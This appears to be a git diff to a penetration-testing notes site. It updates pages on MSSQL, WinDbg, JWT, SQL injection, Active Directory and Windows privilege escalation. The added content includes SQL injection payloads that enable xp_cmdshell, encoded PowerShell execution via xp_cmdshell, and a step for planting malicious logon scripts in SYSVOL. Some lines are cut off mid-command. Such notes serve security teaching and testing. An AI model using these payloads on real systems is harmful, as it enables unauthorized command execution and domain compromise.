Exploit Notes are only for educational purpose or penetration testing, not attacking servers that you're not authorized. This site will not take any responsibility even if you attack the server illegally or cause damage unintentionally. - Please use the contents in this site at your own risk. + Please use the contents at your own risk.
- The contents of this site are not original, but based on the information on the internet, the author actually tried and functioned. + The contents are not original, but based on the information on the internet, the author actually tried and functioned. Although the author strives to post the latest information on the content of this site as much as possible, there is no guarantee that it will always be new.
diff --git a/src/exploit/database/mssql-pentesting.md b/src/exploit/database/mssql-pentesting.md
index 9589b74..a733036 100644
--- a/src/exploit/database/mssql-pentesting.md
+++ b/src/exploit/database/mssql-pentesting.md
@@ -7,7 +7,7 @@ tags:
refs:
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
- https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16
-date: 2024-09-10
+date: 2024-10-13
draft: false
---
@@ -159,21 +159,10 @@ If we connected MSSQL using **impacket**, we can exeucte the Windows Shell Comma
We can execute commands the same as Windows Command Prompt.
```powershell
-# Get current user
> xp_cmdshell whoami
-# Show files and directories
-> xp_cmdshell dir
-> xp_cmdshell dir \Users
-# Show hidden files
-> xp_cmdshell dir /a
-
-# Get current directory
-> xp_cmdshell cd
-
-# Get contents of file
-> xp_cmdshell more \Users\Administrator\example.txt
-> xp_cmdshell type \Users\Administrator\example.txt
+# Execute obfuscated commands.
+> xp_cmdshell 'powershell -e
diff --git a/src/exploit/reverse-engineering/cheatsheet/windbg-cheatsheet.md b/src/exploit/reverse-engineering/cheatsheet/windbg-cheatsheet.md
index 2d3de04..34c08d9 100644
--- a/src/exploit/reverse-engineering/cheatsheet/windbg-cheatsheet.md
+++ b/src/exploit/reverse-engineering/cheatsheet/windbg-cheatsheet.md
@@ -5,7 +5,7 @@ tags:
- Reverse Engineering
refs:
- https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg
-date: 2024-06-27
+date: 2024-10-13
draft: false
---
@@ -39,15 +39,12 @@ See command usage by opening the help menu.
# Force reload
.reload /f
-# List loaded symbols (modules)
-lm
-
# Examine symbols
-x ExecutableName!*
-# e.g.
-x notepad!*
-x notepad!wWin*
-x SampleApp!main
+x ntdll!NtQueryInformationProcess
+x notepad!*main*
+
+# Resolve symbol name from address
+ln 00007ff6`6c5814c0
```
### Troubleshoot for Loading Symbols
@@ -71,6 +68,19 @@ ba w 4 /w "mymodule!globalVariable == 4" mymodule!globalVariable
+## Modules
+
+```bash
+# List modules
+lm
+# List modules whose module names start with 'a'
+lm m a*
+# Display module information
+lm Dvm
+
## Breakpoints
```bash
@@ -133,6 +143,15 @@ qd
+## Processes
+
+```sh
+# List all processes
+!process 0 0
+```
+
+
+
## Disassembly
Select **View → Disassembly** on the menu.
@@ -195,6 +214,47 @@ dps nt!keservicedescriptortable L4
+## Registers
+
+```bash
+# List all registers
+r
+# In thread 0
+~0 r
+# In all threads
+~* r
+
+# Display a specified register
+r rip
+
+# Display a pseudo-register
+r $peb
+r $teb
+
+# Display xmm0 in unsigned bytes 16
+r xmm0:16ub
+
+# Modify a register value
+r rax=0001
+
+# Copy RBX value to RAX
+r rax = @rbx
+```
+
+
+
+## Search Memory
+
+```bash
+# Search the DWORD 'H' in the range of 1000000 bytes from the RSP address.
+s -d @rsp L1000000 'H'
+
+# Search the string "B7" in the range of 10000000 bytes from the RSP address.
+s -a @rsp L10000000 "B7"
+```
+
+
+
## Virtual Memory Protection Information
```bash
@@ -219,7 +279,6 @@ u $exentry
# Unassemble backwards
ub
ub
-
```
diff --git a/src/exploit/web/jwt-pentesting.md b/src/exploit/web/jwt-pentesting.md
index b8fcea6..101ef5f 100644
--- a/src/exploit/web/jwt-pentesting.md
+++ b/src/exploit/web/jwt-pentesting.md
@@ -5,7 +5,7 @@ tags:
- Web
refs:
- https://portswigger.net/web-security/jwt
-date: 2024-09-25
+date: 2024-10-13
draft: false
---
@@ -53,6 +53,12 @@ openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem
+## Modify `exp` Value
+
+If our JWT token is invalid, we can also try to increase the `exp` (expiration) value.
+
+
+
## Automation
**[JWT Toolkit](https://github.com/ticarpi/jwt_tool)** is a toolkit for testing, tweaking and cracking JWT.
diff --git a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
index 81e6ab9..b7b9d76 100644
--- a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
+++ b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
@@ -10,7 +10,7 @@ refs:
- https://portswigger.net/web-security/sql-injection/blind
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
- https://tryhackme.com/room/adventofcyber2023
-date: 2024-05-01
+date: 2024-10-13
draft: false
---
@@ -416,10 +416,21 @@ INSERT INTO users (username, password) VALUES ('admin', '') ON CONFLICT (usernam
## Command Injection
+### MySQL
+
```text
' UNION SELECT NULL,sys_eval('whoami') FROM users-- -
```
+### MSSQL
+
+```html
+
+'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;-- -
+
+'; exec master..xp_cmdshell 'powershell -e
## RCE
diff --git a/src/exploit/windows/active-directory/index.md b/src/exploit/windows/active-directory/index.md
index 27767f0..6861467 100644
--- a/src/exploit/windows/active-directory/index.md
+++ b/src/exploit/windows/active-directory/index.md
@@ -7,7 +7,8 @@ tags:
- Windows
refs:
- https://tryhackme.com/room/adenumeration
-date: 2024-03-26
+ - https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
+date: 2024-10-13
draft: false
---
@@ -113,6 +114,25 @@ dir \\dc.example.com\SYSVOL\
+## Abuse Logon Script for Other Users
+
+If the current user has the permission to write scripts in SYSVOL, we may be able to change other users logon script path.
+
+```bash
+# 1. Check the permission
+icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\
+
+# 2. Modify/Add a malicious script
+'powershell -e
+
## Force Change Password Attack
If we found some username/password, and other usernames, we might be able to change other user passwords. The user needs to have **GenericAll** permission to change passwords of other users.
diff --git a/src/exploit/windows/privilege-escalation/index.md b/src/exploit/windows/privilege-escalation/index.md
index 4ee76ed..56864f2 100644
--- a/src/exploit/windows/privilege-escalation/index.md
+++ b/src/exploit/windows/privilege-escalation/index.md
@@ -8,7 +8,7 @@ tags:
refs:
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
- https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3
-date: 2024-09-14
+date: 2024-10-13
draft: false
---
@@ -25,7 +25,9 @@ We might be able to find vulnerabilities on target Windows machine with automati
## LOLBAS (Living Off the Land Binaries, Scripts and Libraries)
[LOLBAS](https://lolbas-project.github.io/) provides misuses tools and executables already in the Windows system.
-So check the website.
+So check the website.
+
+In addition, I've created the [LOLGEN](https://lolgen.hdks.org/) that generates Living Off The Land payload.
@@ -130,8 +132,8 @@ Get-Service | Where-Object {$_.Status -eq "Running"}
wmic service list
wmic service list | findstr "Backup"
-# Get target process info
-wmic process get processid,parentprocessid,executablepath | find "